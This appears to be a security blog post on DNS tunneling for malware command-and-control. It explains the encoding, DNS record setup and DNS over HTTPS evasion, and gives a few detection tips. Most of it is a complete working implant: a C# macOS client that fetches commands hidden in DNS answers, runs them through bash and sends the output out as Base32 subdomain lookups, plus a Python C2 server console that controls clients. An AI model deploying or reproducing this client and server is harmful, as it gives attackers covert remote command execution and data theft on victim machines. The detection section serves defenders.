The Domain Name System (DNS) is used to resolve hostnames to their associated IP addresses. DNS can be used as a transport mechanism for malware Command & Control (C2) messages. This is useful if an environment has a restrictive web proxy that makes connecting outbound via HTTP difficult.
The concept of DNS tunneling is simple. An attacker configures nameserver records to point to their C2 server. For instance, they could configure an NS record for c2.malware.com, so that any host querying subdomains such as subdomain.c2.malware.com are redirected to this host.
In a corporate environment, typically a client makes a DNS request to an internal DNS server that will in turn query root servers if the system unable to answer the query itself. The DNS client will not directly connect to the attackers server.
Data from the client to the DNS server can be encoded within the A name record. For example, a client could make a request to test1.c2.malware.com, which the server can read to determine the client’s ID is test1. The server can acknowledge this query by encoding data in the IP address returned. For instance, using ASCII encoding, the server could return the letters “wait” by responding with the IP address 119.97.105.116.
To upload larger amounts from the client to the server, data can be Base32 encoded. Base32 is a suitable encoding mechanism since it doesn’t use characters which are restricted in domain names.
DNS tunneling is not restricted to A name records. Other records such as AAAA or TXT can also be used and potentially offer more space for encoded messages therefore increasing traffic throughput.
When a client communicates with a server, each request needs to be unique to prevent intermediary DNS servers from caching the responses.
DNS Record Configuration
The below DNS records are configured using Godaddy’s DNS manager.
Type | Name | Value | TTL |
A | NS1 | 1.1.1.1 | 900 |
NS | C2 | ns1.mydomain.com | 900 |
Any DNS request for subdomain.c2.mydomain.com will be forwarded to the IP address of our C2 server (1.1.1.1).
DNS Over HTTPS (DoH)
DoH is a way of performing DNS lookups over a HTTPS connection.
Cloudflare provide documentation on how to perform these requests. Using DOH has a couple of benefits from an attackers perspective;
- Traffic is encrypted by default. Unless HTTPS inspection is being performed, network analytics systems will not be able to interrogate the traffic.
- The client network will only see connections to the DOH server infrastructure, masking the real destination of the traffic.
DNS Tunneling Detection
There are a number of things defenders can do in relation to DNS tunneling;
- Sinkhole known malicious DNS domains.
- Perform DNS frequency analysis. Most SIEM system provide use cases to trigger based on large increases in DNS requests from a host.
- Most DNS C2 clients rely on Base32 or similar encoding mechanisms. This results in domain lookups that feature long domains with several numbers in them. This is unusual behavior, and again can be alerted on.
- Block direct outbound DNS connections at a firewall level. DNS traffic should only be allowed to leave the organisation from internal DNS servers.
Creating a Proof of Concept Client
Below is a .NET 6 C# client for macOS. The client uses A name records for encoding data, and performs requests either using DNS or DOH.
A Python DNS server is provided. The server does not directly support DOH, although the DOH service used by the client (in this case Cloudflare) will relay standard DNS requests to it.
C# Client Code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 | using System.Diagnostics; using System.Net; using System.Text; using DnsClient; using System.Net.Http.Headers; using Newtonsoft.Json; using Newtonsoft.Json.Linq; public static class c2client { //Config variables static String C2Server = ".test.bordergate.co.uk" ; // Client poll time in milliseconds static int C2delay = 2000; // Placeholder ClientID (will be randomly generated) static String ClientID = "XXXXX" ; // Use Cloudflare DNS over HTTPS static int UseDOH = 1; private static Random random = new Random(); public static string RandomString( int length) { const string chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" ; return new string (Enumerable.Repeat(chars, length) .Select(s => s[random.Next(s.Length)]).ToArray()); } public static string DecodeCommand( string address) //Convert IP address returned by server to ASCII { String result = "error" ; try { string [] octets = address.Split( '.' ); result = "" ; foreach ( var octet in octets) { int unicode = Convert.ToInt32(octet); char character = ( char )unicode; string text = character.ToString(); result += text; } } catch { Console.WriteLine( "Error splitting string: " + address); } return result; } public static string DOHLookup( string domain) // Performs lookup using Cloudflare DOH { String ipv4 = "" ; try { string apiEndpoint = "https://1.1.1.1/dns-query?name=" ; using ( var client = new HttpClient()) { client.DefaultRequestHeaders .Accept .Add( new MediaTypeWithQualityHeaderValue( "application/dns-json" )); var response = client.GetAsync(apiEndpoint + domain).GetAwaiter().GetResult(); if (response.IsSuccessStatusCode) { var responseContent = response.Content; string results = responseContent.ReadAsStringAsync().GetAwaiter().GetResult(); Console.WriteLine(results); dynamic dynObj = JsonConvert.DeserializeObject(results); foreach ( var answer in dynObj.Answer) { ipv4 = answer.data; } } } } catch { Console.WriteLine( "DOH lookup failed" ); } return ipv4; } public static string IPLookup(String domain) //Resolve a domain to IP address { string ip = "" ; if (UseDOH == 1) { ip = DOHLookup(domain); } else { var client = new LookupClient( new LookupClientOptions(NameServer.GooglePublicDns) { UseCache = false , EnableAuditTrail = false , Retries = 10, Timeout = TimeSpan.FromSeconds(20), ThrowDnsErrors = false }); foreach ( var aRecord in client.Query(domain, QueryType.A).Answers.ARecords()) { ip = aRecord.Address.ToString(); } } return ip; } public static void GetCommands() // make a DNS request with a 5 character client ID, and 5 character random value (to prevent caching issues) { String ClientID = RandomString(5).ToString(); String CommandBuffer = "" ; while ( true ) { String request = ClientID + RandomString(5).ToString() + C2Server; String address = IPLookup(request); if (address == "" ) { Console.WriteLine( "DNS Lookup failed: " + request); Console.WriteLine( "Sleeping 10 seconds..." ); System.Threading.Thread.Sleep(10000); } else { String command = DecodeCommand(address.ToString()); Console.WriteLine(DateTime.Now.ToString( "THH:mm:ss" ) + " Server:" + command); if (command == "wait" ) { // do nothing } else if (command == "::::" ) { // :::: signifys command should be executed Console.WriteLine(DateTime.Now.ToString( "THH: mm:ss" ) + " Running command: '" + CommandBuffer + "'" ); UploadResults(ExecCommand(CommandBuffer.Trim())); CommandBuffer = "" ; } else { CommandBuffer += command; } } System.Threading.Thread.Sleep(C2delay); } } public static string ExecCommand(String command) // Execute a command { try { Process p = new Process(); p.StartInfo.UseShellExecute = false ; p.StartInfo.RedirectStandardOutput = true ; p.StartInfo.FileName = "bash" ; p.StartInfo.Arguments = " -c \"" + command + "\"" ; p.Start(); string output = p.StandardOutput.ReadToEnd(); p.WaitForExit(); Console.Write(output); return output; } catch { Console.WriteLine( "Error running command" ); return "Error running command: '" + command + "'" ; } } public static string UploadResults(String results) // Send results back to the server by encoding data in 30 byte A name lookups. { IEnumerable< string > chunks = results.Split(30); foreach ( string chunk in chunks) { if (chunk.Length != 30) { Console.WriteLine( "Padding small chunk: " + chunk.Length); String paddedchunk = chunk.PadRight(30, '^' ); String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(paddedchunk)); Console.WriteLine(Base32Encoded); IPLookup(ClientID + Base32Encoded + C2Server); } else { String Base32Encoded = DNSC2.Base32Encoding.ToString(Encoding.ASCII.GetBytes(chunk)); Console.WriteLine(Base32Encoded); IPLookup(ClientID + Base32Encoded + C2Server); } } return "" ; } public static void Main() { GetCommands(); } } public static class Extensions { public static IEnumerable< string > Split( this string str, int n) { if (String.IsNullOrEmpty(str) || n < 1) { //throw new ArgumentException(); } for ( int i = 0; i < str.Length; i += n) { yield return str.Substring(i, Math.Min(n, str.Length - i)); } } } |
Client Base32 Encoding Library
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 | using System; namespace DNSC2 { public static class Base32Encoding { public static byte [] ToBytes( string input) { if ( string .IsNullOrEmpty(input)) { throw new ArgumentNullException( "input" ); } input = input.TrimEnd( '=' ); //remove padding characters int byteCount = input.Length * 5 / 8; //this must be TRUNCATED byte [] returnArray = new byte [byteCount]; byte curByte = 0, bitsRemaining = 8; int mask = 0, arrayIndex = 0; foreach ( char c in input) { int cValue = CharToValue(c); if (bitsRemaining > 5) { mask = cValue << (bitsRemaining - 5); curByte = ( byte )(curByte | mask); bitsRemaining -= 5; } else { mask = cValue >> (5 - bitsRemaining); curByte = ( byte )(curByte | mask); returnArray[arrayIndex++] = curByte; curByte = ( byte )(cValue << (3 + bitsRemaining)); bitsRemaining += 3; } } //if we didn't end with a full byte if (arrayIndex != byteCount) { returnArray[arrayIndex] = curByte; } return returnArray; } public static string ToString( byte [] input) { if (input == null || input.Length == 0) { throw new ArgumentNullException( "input" ); } int charCount = ( int )Math.Ceiling(input.Length / 5d) * 8; char [] returnArray = new char [charCount]; byte nextChar = 0, bitsRemaining = 5; int arrayIndex = 0; foreach ( byte b in input) { nextChar = ( byte )(nextChar | (b >> (8 - bitsRemaining))); returnArray[arrayIndex++] = ValueToChar(nextChar); if (bitsRemaining < 4) { nextChar = ( byte )((b >> (3 - bitsRemaining)) & 31); returnArray[arrayIndex++] = ValueToChar(nextChar); bitsRemaining += 5; } bitsRemaining -= 3; nextChar = ( byte )((b << bitsRemaining) & 31); } //if we didn't end with a full char if (arrayIndex != charCount) { returnArray[arrayIndex++] = ValueToChar(nextChar); while (arrayIndex != charCount) returnArray[arrayIndex++] = '=' ; //padding } return new string (returnArray); } private static int CharToValue( char c) { int value = ( int )c; //65-90 == uppercase letters if (value < 91 && value > 64) { return value - 65; } //50-55 == numbers 2-7 if (value < 56 && value > 49) { return value - 24; } //97-122 == lowercase letters if (value < 123 && value > 96) { return value - 97; } throw new ArgumentException( "Character is not a Base32 character." , "c" ); } private static char ValueToChar( byte b) { if (b < 26) { return ( char )(b + 65); } if (b < 32) { return ( char )(b + 24); } throw new ArgumentException( "Byte is not a value Base32 value." , "b" ); } } } |
Python Server Code
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 | #!/usr/bin/env python import argparse import datetime import sys import time import threading import traceback import socketserver import struct from dnslib import * import logging clientdict = {} commandlist = [] clientid = '' activeclient = "" class DomainName( str ): def __getattr__( self , item): return DomainName(item + '.' + self ) D = DomainName('') IP = '1.1.1.1' TTL = 1 * 5 soa_record = SOA( mname = D.ns1, # primary name server rname = D.test, # email of the domain administrator times = ( 201307231 , # serial number 60 * 60 * 1 , # refresh 60 * 60 * 3 , # retry 60 * 60 * 24 , # expire 60 * 60 * 1 , # minimum ) ) ns_records = [NS(D.ns1), NS(D.ns2)] records = {} def encodecommand(raw_command): #Take a part of a command and encode it in an IP address responsearray = [ '032' , '032' , '032' , '032' ] i = 0 for letter in raw_command: responsearray[i] = ord (letter) i + = 1 result = "" for octet in responsearray: result + = str (octet) + "." return result[: - 1 ] def c2logic(qn): #Check the domain requested. Supply commands back to client. global commandlist global clientid global clientdict global activeclient requestarray = qn.split( "." ) clientid = requestarray[ 0 ] clientid = clientid[: 5 ] if clientid not in clientdict: print ( "new connection from: " + clientid) dt = datetime.datetime.now() clientdict[clientid] = str (dt) if ( len (clientid) = = 5 ) and (clientid = = activeclient): if len (commandlist) ! = 0 : logging.info( "SERVER RESPONSE" ) logging.info(commandlist) logging.info(commandlist[ 0 ]) response = commandlist[ 0 ] del commandlist[ 0 ] else : response = encodecommand( "wait" ) else : logging.info( "WAITING" ) response = encodecommand( "wait" ) return response return response def dns_response(data): request = DNSRecord.parse(data) reply = DNSRecord(DNSHeader( id = request.header. id , qr = 1 , aa = 1 , ra = 1 ), q = request.q) qname = request.q.qname qn = str (qname) qtype = request.q.qtype qt = QTYPE[qtype] D = qn logging.info( "CLIENT REQUEST: " + qn) command = qn.split( '.' )[ 0 ] # If the request is 10 characters long, it's a beacon id requesting a command if len (command) = = 10 : IP = c2logic(qn) if IP = = '58.58.58.58' : commandlist.clear() records = { D: [A(IP), AAAA(( 0 ,) * 16 ), soa_record]} for name, rrs in records.items(): if name = = qn: for rdata in rrs: rqt = rdata.__class__.__name__ if qt in [ '*' , rqt]: reply.add_answer(RR(rname = qname, rtype = getattr (QTYPE, rqt), rclass = 1 , ttl = TTL, rdata = rdata)) for rdata in ns_records: reply.add_ar(RR(rname = D, rtype = QTYPE.NS, rclass = 1 , ttl = TTL, rdata = rdata)) reply.add_auth(RR(rname = D, rtype = QTYPE.SOA, rclass = 1 , ttl = TTL, rdata = soa_record)) else : # If not a command, it's a response from the client logging.info( "CLIENT RESPONSE " + command) command = command[ 5 :] logging.info( "COMMAND " + command) decoded = base64.b32decode(bytearray(command, 'ascii' )).decode( 'utf-8' ) logging.info(decoded) #print(str(decoded),end = '') print ( str (decoded).replace( '^' ,' '), end = ' ') IP = "9.9.9.9" records = { D: [A(IP), AAAA(( 0 ,) * 16 ), soa_record]} for name, rrs in records.items(): if name = = qn: for rdata in rrs: rqt = rdata.__class__.__name__ if qt in [ '*' , rqt]: reply.add_answer(RR(rname = qname, rtype = getattr (QTYPE, rqt), rclass = 1 , ttl = TTL, rdata = rdata)) for rdata in ns_records: reply.add_ar(RR(rname = D, rtype = QTYPE.NS, rclass = 1 , ttl = TTL, rdata = rdata)) reply.add_auth(RR(rname = D, rtype = QTYPE.SOA, rclass = 1 , ttl = TTL, rdata = soa_record)) #print("---- Reply:\n", reply) return reply.pack() class BaseRequestHandler(socketserver.BaseRequestHandler): def get_data( self ): raise NotImplementedError def send_data( self , data): raise NotImplementedError def handle( self ): now = datetime.datetime.utcnow().strftime( '%Y-%m-%d %H:%M:%S.%f' ) try : data = self .get_data() self .send_data(dns_response(data)) except Exception: pass class TCPRequestHandler(BaseRequestHandler): def get_data( self ): data = self .request.recv( 8192 ).strip() sz = struct.unpack( '>H' , data[: 2 ])[ 0 ] if sz < len (data) - 2 : raise Exception( "Wrong size of TCP packet" ) elif sz > len (data) - 2 : raise Exception( "Too big TCP packet" ) return data[ 2 :] def send_data( self , data): sz = struct.pack( '>H' , len (data)) return self .request.sendall(sz + data) class UDPRequestHandler(BaseRequestHandler): def get_data( self ): return self .request[ 0 ].strip() def send_data( self , data): return self .request[ 1 ].sendto(data, self .client_address) def main(): global activeclient parser = argparse.ArgumentParser(description = 'Start a DNS implemented in Python.' ) parser = argparse.ArgumentParser(description = 'Start a DNS implemented in Python. Usually DNSs use UDP on port 53.' ) parser.add_argument( '--port' , default = 53 , type = int , help = 'The port to listen on.' ) parser.add_argument( '--tcp' , action = 'store_true' , help = 'Listen to TCP connections.' ) parser.add_argument( '--udp' , action = 'store_true' , help = 'Listen to UDP datagrams.' ) parser.add_argument( '-d' , action = 'store_true' , help = 'Debug mode' ) args = parser.parse_args() print ( "Starting nameserver..." ) args.udp = True servers = [] if args.udp: servers.append(socketserver.ThreadingUDPServer(('', args.port), UDPRequestHandler)) if args.tcp: servers.append(socketserver.ThreadingTCPServer(('', args.port), TCPRequestHandler)) if args.d: logging.basicConfig(level = logging.INFO, format = '%(asctime)s :: %(levelname)s :: %(message)s' ) for s in servers: thread = threading.Thread(target = s.serve_forever) thread.daemon = True thread.start() print ( "%s server loop running in thread: %s" % (s.RequestHandlerClass.__name__[: 3 ], thread.name)) try : while 1 : #Take user input. Divide into 4 char chunks and encode. End with '::::'. usercommand = input ( "\n" + clientid + ">" ) if usercommand = = "clients" : print (clientdict) pass elif usercommand.startswith( "active" ): activeclient = usercommand.split( " " )[ 1 ] print ( "active client: " + activeclient) pass else : csize = 4 chunks = [usercommand[i:i + csize] for i in range ( 0 , len (usercommand), csize)] for chunk in chunks: commandlist.append(encodecommand(chunk)) commandlist.append( '58.58.58.58' ) sys.stderr.flush() sys.stdout.flush() except KeyboardInterrupt: pass finally : for s in servers: s.shutdown() if __name__ = = '__main__' : main() |